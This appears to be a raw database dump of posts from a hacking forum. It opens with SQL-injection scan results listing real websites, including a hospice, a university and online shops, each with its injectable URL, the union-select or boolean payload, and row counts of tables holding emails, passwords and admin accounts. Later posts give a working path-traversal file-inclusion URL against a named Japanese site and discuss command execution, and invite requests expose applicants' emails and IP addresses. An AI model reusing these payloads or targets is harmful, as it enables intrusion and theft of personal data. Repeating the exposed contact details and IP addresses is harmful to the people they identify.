holdendecor1.tbl_rlr_user_deleted\r\n[4] holdendecor1.tblUsers\r\n\r\neu.bosscom.com\r\nURL:http://eu.bosscom.com/product.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,271\r\n[2,852] dan31064_bosscom.shopw_customercontacts\r\n[2,105] dan31064_bosscom.shopw_rma\r\n[296] dan31064_bosscom.shopw_newsletter\r\n[18] dan31064_bosscom.shopw_users\r\nTotal Rows:21,523\r\nSearch:admin\r\nRows:16,252\r\n[16,252] dan31064_bosscom.shopw_c5invoice\r\nTotal Rows:35,392\r\nSearch:password\r\nRows:13,869\r\n[13,869] dan31064_bosscom.shopw_customers\r\nTotal Rows:218,501\r\nSearch:user\r\nRows:183,109\r\n[104,393] dan31064_bosscom.shopw_customer_notes\r\n[56,809] dan31064_bosscom.shopw_orders\r\n[15,680] dan31064_bosscom.shopw_log\r\n[4,004] dan31064_bosscom.shopw_packinglists\r\n[1,786] dan31064_bosscom.shopw_rma_store\r\n[301] dan31064_bosscom.shopw_changedsalesperson\r\n[97] dan31064_bosscom.shopw_rma_images\r\n[19] dan31064_bosscom.shopw_shops\r\n[17] dan31064_bosscom.shopw_handbook\r\n[3] dan31064_bosscom.shopw_faq\r\n\r\ncannesguide.com\r\nURL:http://www.cannesguide.com/basics/faq/faqdetails.php?id=999999.9 union all select [t],2\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:3,165\r\n[1,331] CannesGuide.ax_ads\r\n[1,086] CannesGuide.AxAds\r\n[380] CannesGuide.Restaurants\r\n[102] CannesGuide.Orders\r\n[90] CannesGuide.Ads\r\n[74] CannesGuide.RestaurantFeedback\r\n[68] CannesGuide.ax_invoices\r\n[19] CannesGuide.Affiliates\r\n[9] CannesGuide.restaurants_pending\r\n[6] CannesGuide.CFVGOrders\r\nTotal Rows:3,184\r\nSearch:password\r\nRows:19\r\n[19] CannesGuide.Affiliates\r\n\r\npeacehospice.org.uk\r\nURL:http://www.peacehospice.org.uk/viewevent.asp?eventID=536\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,739\r\n[3,370] peacehospicenew.tblorders\r\n[1,005] peacehospicenew.form_teamemail\r\n[446] peacehospicenew.news\r\n[423] peacehospicenew.event\r\n[198] peacehospicenew.vsp\r\n[104] peacehospicenew.job\r\n[80] peacehospicenew.lol_ceremony\r\n[71] peacehospicenew.ecard_creates\r\n[34] peacehospicenew.shopvsp\r\n[7] peacehospicenew.ecard_registrations\r\n[1] peacehospicenew.lol_settings\r\nTotal Rows:5,767\r\nSearch:password\r\nRows:28\r\n[21] peacehospicenew.security\r\n[7] peacehospicenew.ecard_registrations\r\nTotal Rows:8,125\r\nSearch:user\r\nRows:2,358\r\n[2,337] peacehospicenew.logged\r\n[21] peacehospicenew.security\r\n\r\nnjaes.rutgers.edu\r\nURL:http://njaes.rutgers.edu/pubs/category.asp?cat=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:414\r\n[392] shop.tblCustomers\r\n[22] shop.tblUsers\r\nTotal Rows:828\r\nSearch:password\r\nRows:414\r\n[392] shop.tblCustomers\r\n[22] shop.tblUsers\r\nTotal Rows:1,242\r\nSearch:user\r\nRows:414\r\n[392] shop.tblCustomers\r\n[22] shop.tblUsers\r\n\r\ncibse-mnw.org\r\nURL:http://www.cibse-mnw.org/events.asp?id=999999.9 union all select 1,2,3,4,5,6,7,8,[t],10,11\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:106\r\n[73] cibseyen.tbl_emailaddresses\r\n[28] cibseyen.tbl_committee\r\n[2] cibseyen.tbl_organisation\r\n[2] cibseyen.tbl_profiles\r\n[1] cibseyen.tbl_vacancies\r\nTotal Rows:138\r\nSearch:admin\r\nRows:32\r\n[30] cibseyen.tbl_securityhold\r\n[2] cibseyen.tbl_administrators\r\nTotal Rows:170\r\nSearch:user\r\nRows:32\r\n[30] cibseyen.tbl_securityhold\r\n[2] cibseyen.tbl_administrators\r\n\r\ncarolinacandy.com\r\nURL:https://www.carolinacandy.com/OrderForm.asp?cart=\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:459\r\n[459] CarolinaCandy.tbl_customers\r\nTotal Rows:461\r\nSearch:admin\r\nRows:2\r\n[2] CarolinaCandy.tbl_adminusers\r\nTotal Rows:922\r\nSearch:password\r\nRows:461\r\n[459] CarolinaCandy.tbl_customers\r\n[2] CarolinaCandy.tbl_adminusers\r\nTotal Rows:1,383\r\nSearch:user\r\nRows:461\r\n[459] CarolinaCandy.tbl_customers\r\n[2] CarolinaCandy.tbl_adminusers\r\n\r\n99bluebananas.com\r\nURL:http://www.99bluebananas.com/addcart.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:7,792\r\n[7,653] 99b1ue.tbl99Customer\r\n[92] 99b1ue.tbl99RemSent\r\n[47] 99b1ue.tblSupp\r\nTotal Rows:7,793\r\nSearch:user\r\nRows:1\r\n[1] 99b1ue.tbl99User\r\n\r\npentrace.net\r\nURL:http://pentrace.net/penbase/Data_Returns/full_article.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:71\r\n[71] donalhiggins.authors\r\n\r\nsms-siemag.com\r\nURL:http://www.sms-siemag.com/en/pressdetails.php?id=1010\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:4,285\r\n[4,257] admin_sms_group.formulare\r\n[28] admin_sms_group.ansprechpartner\r\nTotal Rows:4,498\r\nSearch:user\r\nRows:213\r\n[155] admin_sms_group.messen\r\n[54] admin_sms_group.p_messen\r\n[4] admin_sms_group.change_log\r\n\r\nmyesrog.com\r\nURL:http://www.myesrog.com/cmsPage.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:10,417\r\n[4,095] myesrog_db.tbl_Oitems\r\n[3,723] myesrog_db.tbl_orders\r\n[1,818] myesrog_db.tbl_customer\r\n[377] myesrog_db.tbl_newLetter\r\n[359] myesrog_db.tbl_ContactUS\r\n[19] myesrog_db.tbl_retailer\r\n[11] myesrog_db.tbl_repparts\r\n[9] myesrog_db.tbl_store\r\n[4] myesrog_db.tbl_custCoverInq\r\n[1] myesrog_db.tbl_adminUsers\r\n[1] myesrog_db.tbl_shippingHandling\r\nTotal Rows:14,159\r\nSearch:admin\r\nRows:3,742\r\n[3,723] myesrog_db.tbl_orders\r\n[19] myesrog_db.cms_pages_items\r\nTotal Rows:15,978\r\nSearch:password\r\nRows:1,819\r\n[1,818] myesrog_db.tbl_customer\r\n[1] myesrog_db.tbl_adminUsers\r\nTotal Rows:15,979\r\nSearch:user\r\nRows:1\r\n[1] myesrog_db.tbl_adminUsers\r\n\r\nrs700.org\r\nURL:http://www.rs700.org/index.asp?selection=News Detail&nid=13372999999.9\' union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13,14 and \'0\'=\'0&Fleet=RS700\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:19,703\r\n[5,969] rsclassassoc.memberslist\r\n[5,077] rsclassassoc.boatregister\r\n[2,772] rsclassassoc.onlineentries\r\n[2,649] rsclassassoc.news\r\n[853] rsclassassoc.gallery\r\n[765] rsclassassoc.calendar\r\n[619] rsclassassoc.calendar_copy\r\n[252] rsclassassoc.forsale\r\n[150] rsclassassoc.clubinfo\r\n[88] rsclassassoc.committee\r\n[73] rsclassassoc.7forumusers\r\n[65] rsclassassoc.6forumusers\r\n[59] rsclassassoc.1forumusers\r\n[45] rsclassassoc.coaches\r\n[39] rsclassassoc.4forumusers\r\n[38] rsclassassoc.2forumusers\r\n[38] rsclassassoc.3forumusers\r\n[35] rsclassassoc.0forumusers\r\n[26] rsclassassoc.champs_contacts\r\n[25] rsclassassoc.technical\r\n[21] rsclassassoc.crewregister\r\n[18] rsclassassoc.adminlist\r\n[16] rsclassassoc.8forumusers\r\n[10] rsclassassoc.5forumusers\r\n[1] rsclassassoc.clubinfo_holding\r\nTotal Rows:25,690\r\nSearch:admin\r\nRows:5,987\r\n[5,969] rsclassassoc.memberslist\r\n[18] rsclassassoc.adminlist\r\nTotal Rows:26,333\r\nSearch:password\r\nRows:643\r\n[252] rsclassassoc.forsale\r\n[73] rsclassassoc.7forumusers\r\n[65] rsclassassoc.6forumusers\r\n[59] rsclassassoc.1forumusers\r\n[39] rsclassassoc.4forumusers\r\n[38] rsclassassoc.2forumusers\r\n[38] rsclassassoc.3forumusers\r\n[35] rsclassassoc.0forumusers\r\n[18] rsclassassoc.adminlist\r\n[16] rsclassassoc.8forumusers\r\n[10] rsclassassoc.5forumusers\r\nTotal Rows:31,260\r\nSearch:user\r\nRows:4,927\r\n[1,253] rsclassassoc.6forummessages\r\n[1,084] rsclassassoc.1forummessages\r\n[665] rsclassassoc.7forummessages\r\n[242] rsclassassoc.0forummessages\r\n[189] rsclassassoc.6forumtopics\r\n[161] rsclassassoc.7forumtopics\r\n[152] rsclassassoc.1forumtopics\r\n[122] rsclassassoc.4forummessages\r\n[118] rsclassassoc.2forummessages\r\n[104] rsclassassoc.8forummessages\r\n[94] rsclassassoc.0forumtopics\r\n[91] rsclassassoc.3forummessages\r\n[73] rsclassassoc.7forumusers\r\n[65] rsclassassoc.6forumusers\r\n[61] rsclassassoc.2forumtopics\r\n[59] rsclassassoc.1forumusers\r\n[56] rsclassassoc.4forumtopics\r\n[54] rsclassassoc.8forumtopics\r\n[39] rsclassassoc.3forumtopics\r\n[39] rsclassassoc.4forumusers\r\n[38] rsclassassoc.2forumusers\r\n[38] rsclassassoc.3forumusers\r\n[35] rsclassassoc.0forumusers\r\n[26] rsclassassoc.5forummessages\r\n[20] rsclassassoc.admins\r\n[17] rsclassassoc.5forumtopics\r\n[16] rsclassassoc.8forumusers\r\n[10] rsclassassoc.5forumusers\r\n[6] rsclassassoc.newscomments\r\n\r\nestagiarios.com\r\nURL:http://www.estagiarios.com/inscrpromo.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:956,472\r\n[730,065] estagiarios.tbl_excluidos\r\n[115,522] estagiarios.alunos\r\n[37,336] estagiarios.seguros\r\n[24,510] estagiarios.contratos\r\n[24,066] estagiarios.empresas\r\n[17,737] estagiarios.tbl_indica\r\n[3,985] estagiarios.tbl_email_mkt\r\n[1,891] estagiarios.tbl_jornalista\r\n[611] estagiarios.buscas\r\n[299] estagiarios.tbl_email_bloqueio\r\n[221] estagiarios.depoimentos\r\n[211] estagiarios.escolas\r\n[16] estagiarios.tbl_mailling_removidos\r\n[2] estagiarios.vagas\r\nTotal Rows:956,510\r\nSearch:admin\r\nRows:38\r\n[38] estagiarios.rotinas_agenda\r\n\r\nprokits.com.tw\r\nURL:http://www.prokits.com.tw/en/product/product_browse.asp?catid=16\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:299\r\n[118] EC.Unsub\r\n[107] EC.members\r\n[60] EC.members_cl\r\n[14] EC.members_tw\r\nTotal Rows:480\r\nSearch:admin\r\nRows:181\r\n[107] EC.members\r\n[60] EC.members_cl\r\n[14] EC.members_tw\r\nTotal Rows:661\r\nSearch:password\r\nRows:181\r\n[107] EC.members\r\n[60] EC.members_cl\r\n[14] EC.members_tw\r\n\r\nipgmcc.com.br\r\nURL:http://www.ipgmcc.com.br/index.asp?id=9\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:426\r\n[426] h1internet1_ipgmcc.cadastropj\r\n\r\nstfrancisce.com\r\nURL:http://www.stfrancisce.com/insight/registry/classlist.asp?catID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:38,789\r\n[29,115] stfrancis.Profile\r\n[6,764] stfrancis.Class\r\n[2,602] stfrancis.profileExt_activities\r\n[244] stfrancis.Instructor\r\n[60] stfrancis.DistrictClientRep\r\n[3] stfrancis.Contact\r\n[1] stfrancis.Client\r\nTotal Rows:67,938\r\nSearch:password\r\nRows:29,149\r\n[29,115] stfrancis.Profile\r\n[34] stfrancis.Users\r\nTotal Rows:930,185\r\nSearch:user\r\nRows:862,247\r\n[294,375] stfrancis.Tran\r\n[123,092] stfrancis.Registration\r\n[111,288] stfrancis.ReservationAgeGrp\r\n[85,262] stfrancis.ReservationSpaceXref\r\n[33,066] stfrancis.StatementDetail\r\n[29,115] stfrancis.Profile\r\n[27,999] stfrancis.ReservationFacilityXref\r\n[27,863] stfrancis.ReservationDate\r\n[26,751] stfrancis.Reservation\r\n[26,484] stfrancis.ActionLog\r\n[17,424] stfrancis.ProfileFamily\r\n[14,015] stfrancis.Attendance\r\n[6,867] stfrancis.Course\r\n[6,841] stfrancis.answers\r\n[6,764] stfrancis.Class\r\n[3,923] stfrancis.Statement\r\n[3,544] stfrancis.ClassFeeXref\r\n[3,205] stfrancis.Payment\r\n[2,671] stfrancis.Fee\r\n[2,602] stfrancis.profileExt_activities\r\n[2,602] stfrancis.profileExt_medical\r\n[1,539] stfrancis.ClassSpaceXref\r\n[1,388] stfrancis.Category\r\n[679] stfrancis.ReservationConflictHolding\r\n[634] stfrancis.SpaceFeeTypeXref\r\n[491] stfrancis.Space\r\n[318] stfrancis.BatchQueue\r\n[244] stfrancis.Instructor\r\n[214] stfrancis.AttendanceFeeXref\r\n[210] stfrancis.SystemCodes\r\n[176] stfrancis.Facility\r\n[86] stfrancis.DistrictClient\r\n[75] stfrancis.ClassProgramRateXref\r\n[74] stfrancis.AcctCode\r\n[66] stfrancis.ServiceCat\r\n[60] stfrancis.DistrictClientRep\r\n[55] stfrancis.ProfileImmunization\r\n[40] stfrancis.Form\r\n[40] stfrancis.ProgramRate\r\n[32] stfrancis.question\r\n[30] stfrancis.questionMap\r\n[16] stfrancis.ReservationSchoolXref\r\n[5] stfrancis.Structure\r\n[4] stfrancis.ClientMsg\r\n[3] stfrancis.Contact\r\n[3] stfrancis.Department\r\n[2] stfrancis.AvailabilitySched\r\n[2] stfrancis.FormProductXref\r\n[2] stfrancis.Product\r\n[2] stfrancis.ProductCategory\r\n[2] stfrancis.questionnaire\r\n[1] stfrancis.AwardViolation\r\n[1] stfrancis.Client\r\n\r\nkochssteeringwheels.com\r\nURL:http://www.kochssteeringwheels.com/productcart/pc/viewPrd.asp?idcategory=[t]&idproduct=71\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:275\r\n[265] kochssteeringwheels.products\r\n[4] kochssteeringwheels.customers\r\n[1] kochssteeringwheels.affiliates\r\n[1] kochssteeringwheels.echo\r\n[1] kochssteeringwheels.emailSettings\r\n[1] kochssteeringwheels.payTypes\r\n[1] kochssteeringwheels.settings\r\n[1] kochssteeringwheels.suppliers\r\nTotal Rows:278\r\nSearch:admin\r\nRows:3\r\n[3] kochssteeringwheels.admins\r\nTotal Rows:297\r\nSearch:password\r\nRows:19\r\n[5] kochssteeringwheels.ShipmentTypes\r\n[4] kochssteeringwheels.customers\r\n[3] kochssteeringwheels.admins\r\n[1] kochssteeringwheels.affiliates\r\n[1] kochssteeringwheels.authorizeNet\r\n[1] kochssteeringwheels.protx\r\n[1] kochssteeringwheels.tclink\r\n[1] kochssteeringwheels.Trine\r\n[1] kochssteeringwheels.ups_license\r\n[1] kochssteeringwheels.verisign_pfp\r\nTotal Rows:305\r\nSearch:user\r\nRows:8\r\n[5] kochssteeringwheels.ShipmentTypes\r\n[1] kochssteeringwheels.PSIGate\r\n[1] kochssteeringwheels.ups_license\r\n[1] kochssteeringwheels.verisign_pfp\r\n\r\nsnlaw.com\r\nURL:http://www.snlaw.com/news/detail.asp?typ=news&id={576E294E-3EB1-4886-953F-3631784C8447}\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:30\r\n[24] spenglerwww.Attorney\r\n[3] spenglerwww.Admin\r\n[3] spenglerwww.Administration\r\nTotal Rows:95\r\nSearch:admin\r\nRows:65\r\n[59] spenglerwww.News\r\n[3] spenglerwww.Admin\r\n[3] spenglerwww.Administration\r\nTotal Rows:98\r\nSearch:password\r\nRows:3\r\n[3] spenglerwww.Admin\r\n\r\nmonforteturismo.com.br\r\nURL:http://www.monforteturismo.com.br/index.asp?id=2999999.9\' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,[t],16,17,18,19,20,21,22 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:267\r\n[191] h1internet_monfortetur.lz_visitor_browsers\r\n[40] h1internet_monfortetur.lz_ticket_messages\r\n[16] h1internet_monfortetur.cotas\r\n[6] h1internet_monfortetur.lz_visitor_chats\r\n[3] h1internet_monfortetur.atendentes\r\n[3] h1internet_monfortetur.lz_predefined\r\n[2] h1internet_monfortetur.config\r\n[2] h1internet_monfortetur.lz_operators\r\n[1] h1internet_monfortetur.casamentos\r\n[1] h1internet_monfortetur.livro\r\n[1] h1internet_monfortetur.lz_data_updates\r\n[1] h1internet_monfortetur.lz_groups\r\nTotal Rows:269\r\nSearch:password\r\nRows:2\r\n[2] h1internet_monfortetur.lz_operators\r\n\r\ngardencitymi.org\r\nURL:http://www.gardencitymi.org/faqs/faq_home.asp?p=parks&id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:45\r\n[36] GrdnCity_Backup.Staff\r\n[7] GrdnCity_Backup.Council\r\n[2] GrdnCity_Backup.Water_ReqforService\r\nTotal Rows:81\r\nSearch:admin\r\nRows:36\r\n[36] GrdnCity_Backup.Staff\r\n\r\natlanticingredients.com\r\nURL:http://www.atlanticingredients.com/services.asp?id=[t]&servicename=Technical Services\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:280\r\n[278] atlanticingredients.orders\r\n[1] atlanticingredients.master\r\n[1] atlanticingredients.tblCalendar\r\nTotal Rows:283\r\nSearch:admin\r\nRows:3\r\n[3] atlanticingredients.tblUsers\r\nTotal Rows:286\r\nSearch:password\r\nRows:3\r\n[3] atlanticingredients.tblUsers\r\n\r\nstoryplace.org\r\nURL:http://www.storyplace.org/preschool/activities/gorillasonact.asp?themeid=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:10,719\r\n[10,719] newstoryplace.tblemail\r\n\r\ngreenforce.com.pk\r\nURL:http://greenforce.com.pk/page.aspx?page_id=999999.9 union all select 1,2,3,4,[t],6,7\r\nMethod:MS SQL Union\r\nSearch:email\r\nRows:320\r\n[153] webente_GFDB.tblOrders\r\n[117] webente_GFDB.tblNewsletterEmail\r\n[49] webente_GFDB.tblmembers\r\n[1] webente_GFDB.tblemails\r\n\r\n[/CODE]', 1, 0, '', 0, 1, 0, 0, 0), (1775, 1083, 1770, 'kx00', 6, '', 1408897525, 'Òðрøú Ѡûþóðüø тðú ÑÂõñõ... \nhxxp://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=&p1=../../../../../../../../../../../var/toralog/tra-w6s-cojp/access-14-08-25.log%00 <== ýð 25 чøÑÂûþ ðúтуðûьýþ(ûþóø Ñ toranoana.co.jp ÑÂõрòõрð). ÿðÿúð /tra-w6s-cojp/ üõýÑÂõтÑÂѠÿþÑÂтþÑÂýýþ(5-7 ÑÂõú) ôøðÿð÷þý þт tra-w0s-cojp ôþ tra-w9s-cojp, Ñ‚.õ. þт 0 ôþ 9. ýуöõý ÑÂúрøÿтøú Ѡцøúûþü ôûѠþñýþòûõýøÑÂ. \núþрþчõ php ôûѠ÷ðûøòúø шõûûð чõрõ÷ ûþóø ýõ ðúтуðûьýþ. perl, python òþ÷üþöýþ ýõ ýõ фðúт(ÿытðÃȄÂÑÂ).\nxss ðúтøòúу üþöýþ ÷ðüутøть ÿþñðûþòðтьÑÂÑÂ)\n\nÿðрðüõтры ôûѠфðùûð ûþóþò þÑÂýþòýþóþ ôþüõýð toranoana.jp\nhxxp://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=&p1=../../../../../../../../../../../var/toralog/tra-w6s/access-14-08-25-AM.log%00 -//--//-', 1, 1, '', 0, 1, 0, 0, 0), (1776, 1083, 1119, 'w0rm', 1, '', 1408898548, '%b %#d, %Y - %a, %I:%M %p Apr 11, 2009 - Sat, 06:27 PM \nцøтðтð òøúøÿõôøø AM/PM\n\núÑÂтðтø úðú üþöõшь ÷ðüõтøть - \n[code]\n#!/usr/local/bin/perl\n# $Id: login.cgi 13814 2006-02-28 06:33:22Z funa $ #\n#\n# loginNew.cgi\n#\nuse lib \"/web/plib\";\nuse lib \"/web/order\";\n\nuse TcsLog;\nuse TcsLogLocal;\nuse IdCrypt13;\nuse R5::ItemDel;\n[/code]\ncgi ýõ øýúûуôøтÑÂÑÂ)\n\nÿðрð ÑÂûþò þ ÷ðÿрþÑÂðх :\n\n[php]\n\n ($out{mycgi_path},$out{mycgi_name})=&ShUtl_R::GetSearchPath($out{item_kind});\n\n #$out{mycgi_name}=\"d_search.cgi\";\n if( $out{item_kind} eq \'2101\' ){\n $out{noimg_thispath}=\n qq{};\n $out{img_thispath}=\n qq{};\n }\n elsif( $out{item_kind} eq \'2102\' ){\n $out{noimg_thispath}=\n qq{};\n $out{img_thispath}=\n qq{};\n }\n elsif( $out{item_kind} eq \'2103\' ){\n#&TcsLog::DBGprintL(__FILE__,__LINE__,\"MDI=$out{mdi},$out{search_media}\\n\");\n $out{noimg_thispath}=\n qq{};\n $out{img_thispath}=\n qq{};\n }\n elsif( $out{item_kind} =~ /^22/ ){\n $out{noimg_thispath}=\n qq{};\n $out{img_thispath}=\n qq{};\n\n }\n elsif( $out{item_kind} =~ /^04/ ){\n if( $out{makAg} == 1 ){\n $makAg = \"&makAg=1&p1=$out{p1}&p2=$out{p2}&p3=$out{p3}\";\n }\n else{\n $makAg = \"\";\n }\n $out{noimg_thispath}=\n qq{};\n $out{img_thispath}=\n qq{};\n }\n else{\n $out{noimg_thispath}=\n qq{};\n $out{img_thispath}=\n qq{};\n[/php]', 1, 0, '', 0, 1, 0, 0, 0), (1777, 1572, 0, 'Invite', 2, '{$name}', 1408901327, '[SIZE=\'4\'][COLOR=\'Sienna\']Recent[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 668670133\n[b]e-mail[/b]: recen7@gmail.com\n[b]Info[/b]: Hello. I am Recent. I have been in the scene for over 10 years now. I started my scene interest with the original starcraft, and was assisting a community that made .dll\'s to inject into the game engine to cheat online @ battle.net. From there I joined h4cky0u and was long standing VIP there, though I mostly idled in the IRC sharing new exploits, gaining access to hundreds of webservers through various exploits (usually SQL injections, LFI escalated to RFI, or just straight and simple RFI\'s). I\'ve stayed a bit away from the scene since h-y was completely disbanded. I can read and modify the following languages: C, C++, C#, Java, PHP, ASP, and the various related languages. I\'m currently a member on a few crappy public forums and I really don\'t enjoy the kind of scene that they provide (opensc, trojanforge, hf). \r\n\r\nI am seeking new things to have fun with, not some script kiddie bullshit like that which is all over the internets with \"booters\" and crappy ripped recompiled and reskinned versions of darkcomet and dbot lol.\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 99.56.220.255\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1778, 1083, 1119, 'w0rm', 1, '', 1408903870, '[code]\nview-source:http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../..//web/cgi-bin/get_hosp.pl%00.jpg?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../..//web/cgi-bin/get_hosp.pl%00.jpg\n[/code]\nø тут ѠÿþýÑÂû чõü ÑÂтþт ÑÂðùт øýтõрõÑÂõý, øщõü ÑÂтðрыõ ôþñрыõ ÑÂøÑÂтõüýы òы÷þòы чõрõ÷ ÿõрû, òÑÂõ чтþ øüõõт @ system evil ÿрþòõрÑÂõü. |id|; ôûѠтõх úтþ ýõ ÿþüýøт)\n\n\n\nsub _setcookie \n{\n my( $html,$id,$cookie_key, $cookie_value,$afg_key,$afg_value ) = @_;\n my $cookie;\n\nòрþôõ úðú ôûöýы òыÿþûýÑÂÑ‚ÑÂѠчõрõ÷ úуúø.', 1, 0, '', 0, 1, 0, 0, 0), (1779, 1573, 0, 'Invite', 2, '{$name}', 1408903966, '[SIZE=\'4\'][COLOR=\'Sienna\']gearman[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: gmail@exploit.im\n[b]e-mail[/b]: yourname@i2pmail.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 128.204.199.209\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://gearman.info | gearman.info \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1780, 1016, 1018, 'opensc', 40, '', 1408909747, 'ýõ тþт фðùû ÷ðûøûø', 1, 0, '', 0, 1, 0, 0, 0), (1781, 1017, 1020, 'opensc', 40, '', 1408910207, 'ûøýú ÑÂôþх', 1, 0, '', 0, 1, 0, 0, 0), (1782, 1574, 0, 'Invite', 2, '{$name}', 1408915135, '[SIZE=\'4\'][COLOR=\'Sienna\']char[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: charstar\n[b]e-mail[/b]: charstar2@safe-mail.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 151.49.198.221\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://char.net | char.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1783, 1575, 0, 'Invite', 2, '{$name}', 1408917789, '[SIZE=\'4\'][COLOR=\'Sienna\']Dr.SHANO[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Fb.me/Shano.Dr\n[b]e-mail[/b]: xss@live.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.230.242.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 